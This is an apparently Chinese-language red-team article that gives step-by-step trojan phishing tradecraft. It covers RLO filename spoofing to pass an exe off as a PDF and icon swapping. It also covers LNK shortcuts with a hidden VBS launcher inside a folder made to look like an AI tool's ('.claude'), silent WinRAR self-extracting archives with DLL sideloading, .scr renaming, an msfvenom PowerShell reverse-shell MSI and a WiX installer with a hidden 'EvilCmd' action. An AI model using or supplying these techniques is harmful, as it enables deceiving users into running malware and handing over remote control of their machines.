ARTICLE · INTELLIGENCE

战地情报 · 详情页

来自尧图项目组的一线实战观察与深度解析

木马钓鱼手法

木马钓鱼手法 预备一个弹计算器的exe来充当木马#includewindows.hintmain(){WinExec(calc.exe,SW_SHOW);return0;}编译成exegcc test.c -o calc.exeRLO混淆法Right-to-Left Override是反转文件名显示的方式通过反转把原本exe的文件后缀名反转到前面达到混淆的方式这里先把名字全清空留下来一个后缀名选择RLO输入dm(因为这里是倒着写的)再次重命名在前面加上一些英文/中文用于掩盖我们的exe这样在名字上就掩盖好了在实际的钓鱼中你可以改成什么福利啊后缀名改成fdp(写进去就变成pdf了)等等然后就是改ico图标(当然了接下来你让ai做也是可以的)这里需要用到工具-ResourceHacker找到Typora.exe拖到resourcehacker点击Icon就可以找到他的icon右键保存就可以了打开我们的exe然后点击Actino-Add an Image…然后选中我们的icon点击保存就可以了成功LNK钓鱼快捷方式钓鱼法用到了快捷方式可以打开cmd来执行命令的特点同时需要用到压缩包发送先创建一个文件夹这里推荐使用.claude或者.workbuddy这样的文件夹来假装是一个ai的文件夹点击属性我们可以选择隐藏来把这个文件夹隐藏起来里面放一个txt文件和我们的钓鱼exe还有启动的VBS(这个是防止出现黑框)VBS内容是Set o CreateObject(WScript.Shell) Set fso CreateObject(Scripting.FileSystemObject) path fso.GetParentFolderName(WScript.ScriptFullName) o.Run path \123.txt,0 o.Run path \123.exe,0新建一个快捷方式点属性改成wscript.exe .workbuddy\run.vbs拿到notepad的ico更改图标设置成刚刚保存的ico这样就可以了然后打包成.zip就可以啦成功自解压钓鱼法这里需要使用到winrar设置这个压缩包为自解压(Create SFX archive)点击高级设置(Advanced)点SFX options然后Path to extract这里可以选择你解压的路径这里我觉得可以设置白加黑DLL(在你知道你要把你的黑DLL放在哪里的时候)或者是把你的目录给放到特定的位置在Setup这里有一个在解压之前运行和解压之后运行比如说我解压到我C盘下解压后我就运行123.exe(压缩包里自带)当然了这里你还可以去比如说白加黑以后运行exe啊或者是搞一个dll注入器直接注入都是没问题的,我觉得都是很好的隐藏点这里只做演示Modes选hide all防止弹窗然后我们就获得了一个自解压的exe文件.scr钓鱼法直接把exe改成scr就行了因为scr本质是exe文件可以直接运行msi钓鱼法这里用msf生成msimsfvenom -p windows/x64/powershell_reverse_tcp LHOST192.168.47.128 LPORT4444 -f msi -o test1.msipython3 -m http.server 8080访问下载运行安装成功反弹shell当然了这里不用msf也可以用WiX进行安装包的打包?xml version1.0? Wix xmlnshttp://schemas.microsoft.com/wix/2006/wi Product Id* NameFakeInstall Language2052 Version1.0.0 Manufacturertest UpgradeCodePUT-GUID-HERE Package InstallerVersion200 Compressedyes / CustomAction IdEvilCmd DirectoryTARGETDIR ExeCommandpowershell -nop -w hidden -c 你的powershell反弹命令 Returnignore / InstallExecuteSequence Custom ActionEvilCmd AfterInstallInitialize / /InstallExecuteSequence /Product /Wix
RELATED READING

延伸阅读

更多一线实战笔记与深度复盘,助您持续精进